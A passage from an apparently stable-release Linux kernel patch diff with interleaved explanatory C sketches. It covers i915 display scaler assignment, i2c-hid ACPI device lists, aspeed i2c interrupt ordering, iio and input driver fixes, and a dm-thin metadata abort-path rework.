++	}
++
++	/* walkthrough scaler_users bits and start assigning scalers */
++	for (i = 0; i < sizeof(scaler_state->scaler_users) * 8; i++) {
++		struct intel_plane_state *plane_state = NULL;
++		int *scaler_id;
++		const char *name;
++		int idx, ret;
++
++		/* skip if scaler not required */
++		if (!(scaler_state->scaler_users & (1 << i)))
++			continue;
++
++		if (i == SKL_CRTC_INDEX) {
++			name = "CRTC";
++			idx = intel_crtc->base.base.id;
++
++			/* panel fitter case: assign as a crtc scaler */
++			scaler_id = &scaler_state->scaler_id;
++		} else {
++			name = "PLANE";
++
++			/* plane scaler case: assign as a plane scaler */
++			/* find the plane that set the bit as scaler_user */
++			plane = drm_state->planes[i].ptr;
++
++			/*
++			 * to enable/disable hq mode, add planes that are using scaler
++			 * into this transaction
++			 */
++			if (!plane) {
++				struct drm_plane_state *state;
++
++				/*
++				 * GLK+ scalers don't have a HQ mode so it
++				 * isn't necessary to change between HQ and dyn mode
++				 * on those platforms.
++				 */
++				if (DISPLAY_VER(dev_priv) >= 10)
++					continue;
++
++				plane = drm_plane_from_index(&dev_priv->drm, i);
++				state = drm_atomic_get_plane_state(drm_state, plane);
++				if (IS_ERR(state)) {
++					drm_dbg_kms(&dev_priv->drm,
++						    "Failed to add [PLANE:%d] to drm_state\n",
++						    plane->base.id);
++					return PTR_ERR(state);
++				}
++			}
++
++			intel_plane = to_intel_plane(plane);
++			idx = plane->base.id;
++
++			/* plane on different crtc cannot be a scaler user of this crtc */
++			if (drm_WARN_ON(&dev_priv->drm,
++					intel_plane->pipe != intel_crtc->pipe))
++				continue;
++
++			plane_state = intel_atomic_get_new_plane_state(intel_state,
++								       intel_plane);
++			scaler_id = &plane_state->scaler_id;
++		}
++
++		ret = intel_atomic_setup_scaler(scaler_state, num_scalers_need,
++						intel_crtc, name, idx,
++						plane_state, scaler_id);
++		if (ret < 0)
++			return ret;
++	}
++
++	return 0;
++}
++
+ static int glk_coef_tap(int i)
+ {
+ 	return i % 7;
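
The scale limits introduced above are in 16.16 fixed point: 0x10000 is a 1.0 factor and 0x30000 - 1 is just under 3.0, so on DISPLAY_VER >= 14 only scaler 0 may downscale vertically. A minimal userspace sketch of that kind of range check follows; the real driver derives the factor via drm_rect_calc_hscale()/drm_rect_calc_vscale(), which the division below only approximates:

    #include <stdio.h>

    /* 16.16 fixed point: 0x10000 == 1.0 */
    static int calc_scale(int src, int dst, int max_scale)
    {
        long long scale;

        if (dst <= 0)
            return -1;
        scale = ((long long)src << 16) / dst;
        return scale > max_scale ? -1 : (int)scale;
    }

    int main(void)
    {
        /* 3840 -> 1920 is a 2.0 downscale, within the ~3.0 limit */
        printf("hscale = 0x%x\n", calc_scale(3840, 1920, 0x30000 - 1));
        /* 3840 -> 960 would be a 4.0 factor and gets rejected */
        printf("rejected: %d\n", calc_scale(3840, 960, 0x30000 - 1));
        return 0;
    }
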
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.h b/drivers/gpu/drm/i915/display/skl_scaler.h
+index 0097d5d08e102..f040f6ac061f2 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.h
++++ b/drivers/gpu/drm/i915/display/skl_scaler.h
+@@ -8,17 +8,22 @@
+ #include <linux/types.h>
+ 
+ enum drm_scaling_filter;
++enum pipe;
+ struct drm_i915_private;
++struct intel_crtc;
+ struct intel_crtc_state;
+-struct intel_plane_state;
+ struct intel_plane;
+-enum pipe;
++struct intel_plane_state;
+ 
+ int skl_update_scaler_crtc(struct intel_crtc_state *crtc_state);
+ 
+ int skl_update_scaler_plane(struct intel_crtc_state *crtc_state,
+ 			    struct intel_plane_state *plane_state);
+ 
++int intel_atomic_setup_scalers(struct drm_i915_private *dev_priv,
++			       struct intel_crtc *intel_crtc,
++			       struct intel_crtc_state *crtc_state);
++
+ void skl_pfit_enable(const struct intel_crtc_state *crtc_state);
+ 
+ void skl_program_plane_scaler(struct intel_plane *plane,
+@@ -26,4 +31,5 @@ void skl_program_plane_scaler(struct intel_plane *plane,
+ 			      const struct intel_plane_state *plane_state);
+ void skl_detach_scalers(const struct intel_crtc_state *crtc_state);
+ void skl_scaler_disable(const struct intel_crtc_state *old_crtc_state);
++
+ #endif
+diff --git a/drivers/hid/i2c-hid/i2c-hid-acpi.c b/drivers/hid/i2c-hid/i2c-hid-acpi.c
+index b96ae15e0ad91..6d35bb3974818 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-acpi.c
++++ b/drivers/hid/i2c-hid/i2c-hid-acpi.c
+@@ -39,8 +39,13 @@ static const struct acpi_device_id i2c_hid_acpi_blacklist[] = {
+ 	 * The CHPN0001 ACPI device, which is used to describe the Chipone
+ 	 * ICN8505 controller, has a _CID of PNP0C50 but is not HID compatible.
+ 	 */
+-	{"CHPN0001", 0 },
+-	{ },
++	{ "CHPN0001" },
++	/*
++	 * The IDEA5002 ACPI device causes high interrupt usage and spurious
++	 * wakeups from suspend.
++	 */
++	{ "IDEA5002" },
++	{ }
+ };
+ 
+ /* HID I²C Device: 3cdff6f7-4267-4555-ad05-b30a3d8938de */
+@@ -115,9 +120,9 @@ static int i2c_hid_acpi_probe(struct i2c_client *client)
+ }
+ 
+ static const struct acpi_device_id i2c_hid_acpi_match[] = {
+-	{"ACPI0C50", 0 },
+-	{"PNP0C50", 0 },
+-	{ },
++	{ "ACPI0C50" },
++	{ "PNP0C50" },
++	{ }
+ };
+ MODULE_DEVICE_TABLE(acpi, i2c_hid_acpi_match);
+ 
+diff --git a/drivers/i2c/busses/i2c-aspeed.c b/drivers/i2c/busses/i2c-aspeed.c
+index 6adf3b141316b..86daf791aa27c 100644
+--- a/drivers/i2c/busses/i2c-aspeed.c
++++ b/drivers/i2c/busses/i2c-aspeed.c
+@@ -249,18 +249,46 @@ static u32 aspeed_i2c_slave_irq(struct aspeed_i2c_bus *bus, u32 irq_status)
+ 	if (!slave)
+ 		return 0;
+ 
+-	command = readl(bus->base + ASPEED_I2C_CMD_REG);
++	/*
++	 * Handle stop conditions early, prior to SLAVE_MATCH. Some masters may drive
++	 * transfers with low enough latency between the nak/stop phase of the current
++	 * command and the start/address phase of the following command that the
++	 * interrupts are coalesced by the time we process them.
++	 */
++	if (irq_status & ASPEED_I2CD_INTR_NORMAL_STOP) {
++		irq_handled |= ASPEED_I2CD_INTR_NORMAL_STOP;
++		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
++	}
++
++	if (irq_status & ASPEED_I2CD_INTR_TX_NAK &&
++	    bus->slave_state == ASPEED_I2C_SLAVE_READ_PROCESSED) {
++		irq_handled |= ASPEED_I2CD_INTR_TX_NAK;
++		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
++	}
++
++	/* Propagate any stop conditions to the slave implementation. */
++	if (bus->slave_state == ASPEED_I2C_SLAVE_STOP) {
++		i2c_slave_event(slave, I2C_SLAVE_STOP, &value);
++		bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
++	}
+ 
+-	/* Slave was requested, restart state machine. */
++	/*
++	 * Now that we've dealt with any potentially coalesced stop conditions,
++	 * address any start conditions.
++	 */
+ 	if (irq_status & ASPEED_I2CD_INTR_SLAVE_MATCH) {
+ 		irq_handled |= ASPEED_I2CD_INTR_SLAVE_MATCH;
+ 		bus->slave_state = ASPEED_I2C_SLAVE_START;
+ 	}
+ 
+-	/* Slave is not currently active, irq was for someone else. */
++	/*
++	 * If the slave has been stopped and not started then slave interrupt
++	 * handling is complete.
++	 */
+ 	if (bus->slave_state == ASPEED_I2C_SLAVE_INACTIVE)
+ 		return irq_handled;
+ 
++	command = readl(bus->base + ASPEED_I2C_CMD_REG);
+ 	dev_dbg(bus->dev, "slave irq status 0x%08x, cmd 0x%08x\n",
+ 		irq_status, command);
+ 
+@@ -279,17 +307,6 @@ static u32 aspeed_i2c_slave_irq(struct aspeed_i2c_bus *bus, u32 irq_status)
+ 		irq_handled |= ASPEED_I2CD_INTR_RX_DONE;
+ 	}
+ 
+-	/* Slave was asked to stop. */
+-	if (irq_status & ASPEED_I2CD_INTR_NORMAL_STOP) {
+-		irq_handled |= ASPEED_I2CD_INTR_NORMAL_STOP;
+-		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
+-	}
+-	if (irq_status & ASPEED_I2CD_INTR_TX_NAK &&
+-	    bus->slave_state == ASPEED_I2C_SLAVE_READ_PROCESSED) {
+-		irq_handled |= ASPEED_I2CD_INTR_TX_NAK;
+-		bus->slave_state = ASPEED_I2C_SLAVE_STOP;
+-	}
+-
+ 	switch (bus->slave_state) {
+ 	case ASPEED_I2C_SLAVE_READ_REQUESTED:
+ 		if (unlikely(irq_status & ASPEED_I2CD_INTR_TX_ACK))
+@@ -324,8 +341,7 @@ static u32 aspeed_i2c_slave_irq(struct aspeed_i2c_bus *bus, u32 irq_status)
+ 		i2c_slave_event(slave, I2C_SLAVE_WRITE_RECEIVED, &value);
+ 		break;
+ 	case ASPEED_I2C_SLAVE_STOP:
+-		i2c_slave_event(slave, I2C_SLAVE_STOP, &value);
+-		bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
++		/* Stop event handling is done early. Unreachable. */
+ 		break;
+ 	case ASPEED_I2C_SLAVE_START:
+ 		/* Slave was just started. Waiting for the next event. */;
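
The i2c-aspeed rework above handles stop conditions before SLAVE_MATCH, so that a status word carrying a coalesced stop + start from back-to-back transfers is processed in bus order. A toy model of that ordering, with illustrative names rather than the driver's own:

    #include <stdio.h>

    #define INTR_STOP        (1u << 0)
    #define INTR_SLAVE_MATCH (1u << 1)

    enum slave_state { INACTIVE, START, STOP };

    /*
     * Process a possibly coalesced status word in bus order: the previous
     * transfer's stop is delivered before the new transfer's start,
     * instead of being deferred behind the SLAVE_MATCH handling.
     */
    static enum slave_state handle_irq(unsigned int status, enum slave_state s)
    {
        if (status & INTR_STOP)
            s = STOP;
        if (s == STOP) {
            /* i2c_slave_event(slave, I2C_SLAVE_STOP, ...) would go here */
            s = INACTIVE;
        }
        if (status & INTR_SLAVE_MATCH)
            s = START;
        return s;
    }

    int main(void)
    {
        /* back-to-back transfers whose interrupts coalesced into one status */
        enum slave_state s = handle_irq(INTR_STOP | INTR_SLAVE_MATCH, STOP);

        printf("state after coalesced irq: %d (START == %d)\n", s, START);
        return 0;
    }
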
+diff --git a/drivers/iio/adc/ti_am335x_adc.c b/drivers/iio/adc/ti_am335x_adc.c
+index 642c5c4895e37..3ac253a27dd97 100644
+--- a/drivers/iio/adc/ti_am335x_adc.c
++++ b/drivers/iio/adc/ti_am335x_adc.c
+@@ -671,8 +671,10 @@ static int tiadc_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, indio_dev);
+ 
+ 	err = tiadc_request_dma(pdev, adc_dev);
+-	if (err && err == -EPROBE_DEFER)
++	if (err && err != -ENODEV) {
++		dev_err_probe(&pdev->dev, err, "DMA request failed\n");
+ 		goto err_dma;
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/iio/buffer/industrialio-triggered-buffer.c b/drivers/iio/buffer/industrialio-triggered-buffer.c
+index 8d4fc97d10059..2b7873e8a959b 100644
+--- a/drivers/iio/buffer/industrialio-triggered-buffer.c
++++ b/drivers/iio/buffer/industrialio-triggered-buffer.c
+@@ -46,6 +46,16 @@ int iio_triggered_buffer_setup_ext(struct iio_dev *indio_dev,
+ 	struct iio_buffer *buffer;
+ 	int ret;
+ 
++	/*
++	 * iio_triggered_buffer_cleanup() assumes that the buffer allocated here
++	 * is assigned to indio_dev->buffer but this is only the case if this
++	 * function is the first caller to iio_device_attach_buffer(). If
++	 * indio_dev->buffer is already set then we can't proceed otherwise the
++	 * cleanup function will try to free a buffer that was not allocated here.
++	 */
++	if (indio_dev->buffer)
++		return -EADDRINUSE;
++
+ 	buffer = iio_kfifo_allocate();
+ 	if (!buffer) {
+ 		ret = -ENOMEM;
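
The new guard above makes iio_triggered_buffer_setup_ext() refuse to run when a buffer is already attached, keeping its cleanup's ownership assumption valid. The same pattern in miniature (hypothetical names):

    #include <errno.h>
    #include <stdio.h>

    struct dev { void *buffer; };

    /*
     * Setup only proceeds when it will be the one to attach the buffer,
     * so the matching cleanup can assume it owns dev->buffer.
     */
    static int setup(struct dev *d, void *buf)
    {
        if (d->buffer)
            return -EADDRINUSE;
        d->buffer = buf;
        return 0;
    }

    int main(void)
    {
        struct dev d = { 0 };
        int first = setup(&d, (void *)0x1);
        int second = setup(&d, (void *)0x2);  /* rejected */

        printf("first=%d second=%d\n", first, second);
        return 0;
    }
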
+diff --git a/drivers/iio/common/ms_sensors/ms_sensors_i2c.c b/drivers/iio/common/ms_sensors/ms_sensors_i2c.c
+index 6633b35a94e69..9c9bc77003c7f 100644
+--- a/drivers/iio/common/ms_sensors/ms_sensors_i2c.c
++++ b/drivers/iio/common/ms_sensors/ms_sensors_i2c.c
+@@ -15,8 +15,8 @@
+ /* Conversion times in us */
+ static const u16 ms_sensors_ht_t_conversion_time[] = { 50000, 25000,
+ 						       13000, 7000 };
+-static const u16 ms_sensors_ht_h_conversion_time[] = { 16000, 3000,
+-						       5000, 8000 };
++static const u16 ms_sensors_ht_h_conversion_time[] = { 16000, 5000,
++						       3000, 8000 };
+ static const u16 ms_sensors_tp_conversion_time[] = { 500, 1100, 2100,
+ 						     4100, 8220, 16440 };
+ 
+diff --git a/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c b/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c
+index 86fbbe9040503..19a1ef5351d24 100644
+--- a/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c
++++ b/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c
+@@ -736,13 +736,13 @@ inv_mpu6050_read_raw(struct iio_dev *indio_dev,
+ 			ret = inv_mpu6050_sensor_show(st, st->reg->gyro_offset,
+ 						chan->channel2, val);
+ 			mutex_unlock(&st->lock);
+-			return IIO_VAL_INT;
++			return ret;
+ 		case IIO_ACCEL:
+ 			mutex_lock(&st->lock);
+ 			ret = inv_mpu6050_sensor_show(st, st->reg->accl_offset,
+ 						chan->channel2, val);
+ 			mutex_unlock(&st->lock);
+-			return IIO_VAL_INT;
++			return ret;
+ 
+ 		default:
+ 			return -EINVAL;
+diff --git a/drivers/input/keyboard/ipaq-micro-keys.c b/drivers/input/keyboard/ipaq-micro-keys.c
+index 13a66a8e3411f..e0c51189e329c 100644
+--- a/drivers/input/keyboard/ipaq-micro-keys.c
++++ b/drivers/input/keyboard/ipaq-micro-keys.c
+@@ -105,6 +105,9 @@ static int micro_key_probe(struct platform_device *pdev)
+ 	keys->codes = devm_kmemdup(&pdev->dev, micro_keycodes,
+ 			   keys->input->keycodesize * keys->input->keycodemax,
+ 			   GFP_KERNEL);
++	if (!keys->codes)
++		return -ENOMEM;
++
+ 	keys->input->keycode = keys->codes;
+ 
+ 	__set_bit(EV_KEY, keys->input->evbit);
+diff --git a/drivers/input/misc/soc_button_array.c b/drivers/input/misc/soc_button_array.c
+index e79f5497948b8..9116f4248fd09 100644
+--- a/drivers/input/misc/soc_button_array.c
++++ b/drivers/input/misc/soc_button_array.c
+@@ -299,6 +299,11 @@ static int soc_button_parse_btn_desc(struct device *dev,
+ 		info->name = "power";
+ 		info->event_code = KEY_POWER;
+ 		info->wakeup = true;
++	} else if (upage == 0x01 && usage == 0xc6) {
++		info->name = "airplane mode switch";
++		info->event_type = EV_SW;
++		info->event_code = SW_RFKILL_ALL;
++		info->active_low = false;
+ 	} else if (upage == 0x01 && usage == 0xca) {
+ 		info->name = "rotation lock switch";
+ 		info->event_type = EV_SW;
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 0c6fc954e7296..1d9494f64a215 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -381,6 +381,9 @@ struct icc_node_data *of_icc_get_from_provider(struct of_phandle_args *spec)
+ 	}
+ 	mutex_unlock(&icc_lock);
+ 
++	if (!node)
++		return ERR_PTR(-EINVAL);
++
+ 	if (IS_ERR(node))
+ 		return ERR_CAST(node);
+ 
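
The interconnect fix above matters because of_icc_get_from_provider()'s lookup can fall through with node still NULL, which IS_ERR() does not catch. A small userspace rendering of the kernel's ERR_PTR convention, simplified from include/linux/err.h:

    #include <errno.h>
    #include <stdio.h>

    #define MAX_ERRNO 4095

    /* Userspace copy of the kernel's ERR_PTR convention (simplified). */
    static void *ERR_PTR(long err) { return (void *)err; }
    static long PTR_ERR(const void *p) { return (long)p; }
    static int IS_ERR(const void *p)
    {
        return (unsigned long)p >= (unsigned long)-MAX_ERRNO;
    }

    static int found = 42;

    /* A lookup can return a valid pointer, an encoded errno, or NULL. */
    static void *lookup(int key)
    {
        if (key == 1)
            return ERR_PTR(-ENOMEM);  /* provider failed */
        if (key == 2)
            return NULL;              /* simply never matched */
        return &found;
    }

    int main(void)
    {
        void *node = lookup(2);

        /* NULL is not caught by IS_ERR(), hence the explicit check */
        if (!node)
            node = ERR_PTR(-EINVAL);
        if (IS_ERR(node))
            printf("error: %ld\n", PTR_ERR(node));
        return 0;
    }
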
+diff --git a/drivers/interconnect/qcom/sm8250.c b/drivers/interconnect/qcom/sm8250.c
+index 5cdb058fa0959..9c2dd40d9a559 100644
+--- a/drivers/interconnect/qcom/sm8250.c
++++ b/drivers/interconnect/qcom/sm8250.c
+@@ -551,6 +551,7 @@ static struct platform_driver qnoc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-sm8250",
+ 		.of_match_table = qnoc_of_match,
++		.sync_state = icc_sync_state,
+ 	},
+ };
+ module_platform_driver(qnoc_driver);
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 382c5cc471952..100a6a236d92a 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -1914,6 +1914,13 @@ void dm_bufio_client_destroy(struct dm_bufio_client *c)
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_client_destroy);
+ 
++void dm_bufio_client_reset(struct dm_bufio_client *c)
++{
++	drop_buffers(c);
++	flush_work(&c->shrink_work);
++}
++EXPORT_SYMBOL_GPL(dm_bufio_client_reset);
++
+ void dm_bufio_set_sector_offset(struct dm_bufio_client *c, sector_t start)
+ {
+ 	c->start = start;
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index fe7dad3ffa75f..77fcff82c82ac 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -1763,11 +1763,12 @@ static void integrity_metadata(struct work_struct *w)
+ 		sectors_to_process = dio->range.n_sectors;
+ 
+ 		__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
++			struct bio_vec bv_copy = bv;
+ 			unsigned int pos;
+ 			char *mem, *checksums_ptr;
+ 
+ again:
+-			mem = bvec_kmap_local(&bv);
++			mem = bvec_kmap_local(&bv_copy);
+ 			pos = 0;
+ 			checksums_ptr = checksums;
+ 			do {
+@@ -1776,7 +1777,7 @@ again:
+ 				sectors_to_process -= ic->sectors_per_block;
+ 				pos += ic->sectors_per_block << SECTOR_SHIFT;
+ 				sector += ic->sectors_per_block;
+-			} while (pos < bv.bv_len && sectors_to_process && checksums != checksums_onstack);
++			} while (pos < bv_copy.bv_len && sectors_to_process && checksums != checksums_onstack);
+ 			kunmap_local(mem);
+ 
+ 			r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+@@ -1801,9 +1802,9 @@ again:
+ 			if (!sectors_to_process)
+ 				break;
+ 
+-			if (unlikely(pos < bv.bv_len)) {
+-				bv.bv_offset += pos;
+-				bv.bv_len -= pos;
++			if (unlikely(pos < bv_copy.bv_len)) {
++				bv_copy.bv_offset += pos;
++				bv_copy.bv_len -= pos;
+ 				goto again;
+ 			}
+ 		}
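
The dm-integrity fix above advances a local bio_vec copy instead of the one produced by __bio_for_each_segment(), since the iterator's view of the segment must stay untouched. Sketched in plain C with a hypothetical bvec struct:

    #include <stdio.h>

    struct bvec { unsigned int bv_offset, bv_len; };

    /*
     * The segment handed out by the iterator is consumed in per-block
     * steps through a local copy, so the original descriptor is never
     * mutated -- the bug fixed above was advancing bv itself while the
     * enclosing iterator still relied on it.
     */
    static void checksum_segment(const struct bvec *bv, unsigned int block)
    {
        struct bvec bv_copy = *bv;

        while (bv_copy.bv_len) {
            unsigned int n = bv_copy.bv_len < block ? bv_copy.bv_len : block;

            printf("checksum %u bytes at offset %u\n", n, bv_copy.bv_offset);
            bv_copy.bv_offset += n;
            bv_copy.bv_len -= n;
        }
    }

    int main(void)
    {
        struct bvec bv = { .bv_offset = 0, .bv_len = 2048 };

        checksum_segment(&bv, 512);
        return 0;
    }
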
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 4a0e15109997b..bb0e0a270f62a 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -597,6 +597,8 @@ static int __format_metadata(struct dm_pool_metadata *pmd)
+ 	r = dm_tm_create_with_sm(pmd->bm, THIN_SUPERBLOCK_LOCATION,
+ 				 &pmd->tm, &pmd->metadata_sm);
+ 	if (r < 0) {
++		pmd->tm = NULL;
++		pmd->metadata_sm = NULL;
+ 		DMERR("tm_create_with_sm failed");
+ 		return r;
+ 	}
+@@ -605,6 +607,7 @@ static int __format_metadata(struct dm_pool_metadata *pmd)
+ 	if (IS_ERR(pmd->data_sm)) {
+ 		DMERR("sm_disk_create failed");
+ 		r = PTR_ERR(pmd->data_sm);
++		pmd->data_sm = NULL;
+ 		goto bad_cleanup_tm;
+ 	}
+ 
+@@ -635,11 +638,15 @@ static int __format_metadata(struct dm_pool_metadata *pmd)
+ 
+ bad_cleanup_nb_tm:
+ 	dm_tm_destroy(pmd->nb_tm);
++	pmd->nb_tm = NULL;
+ bad_cleanup_data_sm:
+ 	dm_sm_destroy(pmd->data_sm);
++	pmd->data_sm = NULL;
+ bad_cleanup_tm:
+ 	dm_tm_destroy(pmd->tm);
++	pmd->tm = NULL;
+ 	dm_sm_destroy(pmd->metadata_sm);
++	pmd->metadata_sm = NULL;
+ 
+ 	return r;
+ }
+@@ -705,6 +712,8 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 			       sizeof(disk_super->metadata_space_map_root),
+ 			       &pmd->tm, &pmd->metadata_sm);
+ 	if (r < 0) {
++		pmd->tm = NULL;
++		pmd->metadata_sm = NULL;
+ 		DMERR("tm_open_with_sm failed");
+ 		goto bad_unlock_sblock;
+ 	}
+@@ -714,6 +723,7 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 	if (IS_ERR(pmd->data_sm)) {
+ 		DMERR("sm_disk_open failed");
+ 		r = PTR_ERR(pmd->data_sm);
++		pmd->data_sm = NULL;
+ 		goto bad_cleanup_tm;
+ 	}
+ 
+@@ -740,9 +750,12 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 
+ bad_cleanup_data_sm:
+ 	dm_sm_destroy(pmd->data_sm);
++	pmd->data_sm = NULL;
+ bad_cleanup_tm:
+ 	dm_tm_destroy(pmd->tm);
++	pmd->tm = NULL;
+ 	dm_sm_destroy(pmd->metadata_sm);
++	pmd->metadata_sm = NULL;
+ bad_unlock_sblock:
+ 	dm_bm_unlock(sblock);
+ 
+@@ -789,9 +802,13 @@ static void __destroy_persistent_data_objects(struct dm_pool_metadata *pmd,
+ 					      bool destroy_bm)
+ {
+ 	dm_sm_destroy(pmd->data_sm);
++	pmd->data_sm = NULL;
+ 	dm_sm_destroy(pmd->metadata_sm);
++	pmd->metadata_sm = NULL;
+ 	dm_tm_destroy(pmd->nb_tm);
++	pmd->nb_tm = NULL;
+ 	dm_tm_destroy(pmd->tm);
++	pmd->tm = NULL;
+ 	if (destroy_bm)
+ 		dm_block_manager_destroy(pmd->bm);
+ }
+@@ -999,8 +1016,7 @@ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ 			       __func__, r);
+ 	}
+ 	pmd_write_unlock(pmd);
+-	if (!pmd->fail_io)
+-		__destroy_persistent_data_objects(pmd, true);
++	__destroy_persistent_data_objects(pmd, true);
+ 
+ 	kfree(pmd);
+ 	return 0;
+@@ -1875,53 +1891,29 @@ static void __set_abort_with_changes_flags(struct dm_pool_metadata *pmd)
+ int dm_pool_abort_metadata(struct dm_pool_metadata *pmd)
+ {
+ 	int r = -EINVAL;
+-	struct dm_block_manager *old_bm = NULL, *new_bm = NULL;
+ 
+ 	/* fail_io is double-checked with pmd->root_lock held below */
+ 	if (unlikely(pmd->fail_io))
+ 		return r;
+ 
+-	/*
+-	 * Replacement block manager (new_bm) is created and old_bm destroyed outside of
+-	 * pmd root_lock to avoid ABBA deadlock that would result (due to life-cycle of
+-	 * shrinker associated with the block manager's bufio client vs pmd root_lock).
+-	 * - must take shrinker_rwsem without holding pmd->root_lock
+-	 */
+-	new_bm = dm_block_manager_create(pmd->bdev, THIN_METADATA_BLOCK_SIZE << SECTOR_SHIFT,
+-					 THIN_MAX_CONCURRENT_LOCKS);
+-
+ 	pmd_write_lock(pmd);
+ 	if (pmd->fail_io) {
+ 		pmd_write_unlock(pmd);
+-		goto out;
++		return r;
+ 	}
+-
+ 	__set_abort_with_changes_flags(pmd);
++
++	/* destroy data_sm/metadata_sm/nb_tm/tm */
+ 	__destroy_persistent_data_objects(pmd, false);
+-	old_bm = pmd->bm;
+-	if (IS_ERR(new_bm)) {
+-		DMERR("could not create block manager during abort");
+-		pmd->bm = NULL;
+-		r = PTR_ERR(new_bm);
+-		goto out_unlock;
+-	}
+ 
+-	pmd->bm = new_bm;
++	/* reset bm */
++	dm_block_manager_reset(pmd->bm);
++
++	/* rebuild data_sm/metadata_sm/nb_tm/tm */
+ 	r = __open_or_format_metadata(pmd, false);
+-	if (r) {
+-		pmd->bm = NULL;
+-		goto out_unlock;
+-	}
+-	new_bm = NULL;
+-out_unlock:
+ 	if (r)
+ 		pmd->fail_io = true;
+ 	pmd_write_unlock(pmd);
+-	dm_block_manager_destroy(old_bm);
+-out:
+-	if (new_bm && !IS_ERR(new_bm))
+-		dm_block_manager_destroy(new_bm);
+-
+ 	return r;
+ }
+ 
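
Across the dm-thin changes above, every destroy helper becomes NULL-tolerant and every destroyed pointer is cleared, so dm_pool_abort_metadata() can tear the objects down in place, reset the block manager's bufio client, and rebuild, with a later close remaining safe. The idiom in miniature (hypothetical types):

    #include <stdlib.h>

    struct sm { int dummy; };

    /* NULL-tolerant destroy, as dm_sm_destroy()/dm_tm_destroy() now are. */
    static void sm_destroy(struct sm *s)
    {
        if (!s)
            return;
        free(s);
    }

    struct pmd { struct sm *data_sm, *metadata_sm; };

    static void destroy_objects(struct pmd *p)
    {
        sm_destroy(p->data_sm);
        p->data_sm = NULL;        /* clear so a repeated teardown is a no-op */
        sm_destroy(p->metadata_sm);
        p->metadata_sm = NULL;
    }

    int main(void)
    {
        /* half-built state: metadata_sm was never created */
        struct pmd p = { malloc(sizeof(struct sm)), NULL };

        destroy_objects(&p);   /* abort path */
        destroy_objects(&p);   /* later close path, now safe */
        return 0;
    }
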
+diff --git a/drivers/md/persistent-data/dm-block-manager.c b/drivers/md/persistent-data/dm-block-manager.c
+index 1f40100908d7c..2bbfbb704c751 100644
+--- a/drivers/md/persistent-data/dm-block-manager.c
++++ b/drivers/md/persistent-data/dm-block-manager.c
+@@ -415,6 +415,12 @@ void dm_block_manager_destroy(struct dm_block_manager *bm)
+ }
+ EXPORT_SYMBOL_GPL(dm_block_manager_destroy);
+ 
++void dm_block_manager_reset(struct dm_block_manager *bm)
++{
++	dm_bufio_client_reset(bm->bufio);
++}
++EXPORT_SYMBOL_GPL(dm_block_manager_reset);
++
+ unsigned int dm_bm_block_size(struct dm_block_manager *bm)
+ {
+ 	return dm_bufio_get_block_size(bm->bufio);
+diff --git a/drivers/md/persistent-data/dm-block-manager.h b/drivers/md/persistent-data/dm-block-manager.h
+index 58a23b8ec1902..4371d85d3c258 100644
+--- a/drivers/md/persistent-data/dm-block-manager.h
++++ b/drivers/md/persistent-data/dm-block-manager.h
+@@ -35,6 +35,7 @@ struct dm_block_manager *dm_block_manager_create(
+ 	struct block_device *bdev, unsigned int block_size,
+ 	unsigned int max_held_per_thread);
+ void dm_block_manager_destroy(struct dm_block_manager *bm);
++void dm_block_manager_reset(struct dm_block_manager *bm);
+ 
+ unsigned int dm_bm_block_size(struct dm_block_manager *bm);
+ dm_block_t dm_bm_nr_blocks(struct dm_block_manager *bm);
+diff --git a/drivers/md/persistent-data/dm-space-map.h b/drivers/md/persistent-data/dm-space-map.h
+index a015cd11f6e97..85aa0a3974fe0 100644
+--- a/drivers/md/persistent-data/dm-space-map.h
++++ b/drivers/md/persistent-data/dm-space-map.h
+@@ -76,7 +76,8 @@ struct dm_space_map {
+ 
+ static inline void dm_sm_destroy(struct dm_space_map *sm)
+ {
+-	sm->destroy(sm);
++	if (sm)
++		sm->destroy(sm);
+ }
+ 
+ static inline int dm_sm_extend(struct dm_space_map *sm, dm_block_t extra_blocks)
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.c b/drivers/md/persistent-data/dm-transaction-manager.c
+index 39885f8355847..557a3ecfe75a0 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.c
++++ b/drivers/md/persistent-data/dm-transaction-manager.c
+@@ -197,6 +197,9 @@ EXPORT_SYMBOL_GPL(dm_tm_create_non_blocking_clone);
+ 
+ void dm_tm_destroy(struct dm_transaction_manager *tm)
+ {
++	if (!tm)
++		return;
++
+ 	if (!tm->is_clone)
+ 		wipe_shadow_table(tm);
+ 
+diff --git a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+index 5935be190b9e2..5f2a6fcba9670 100644
+--- a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
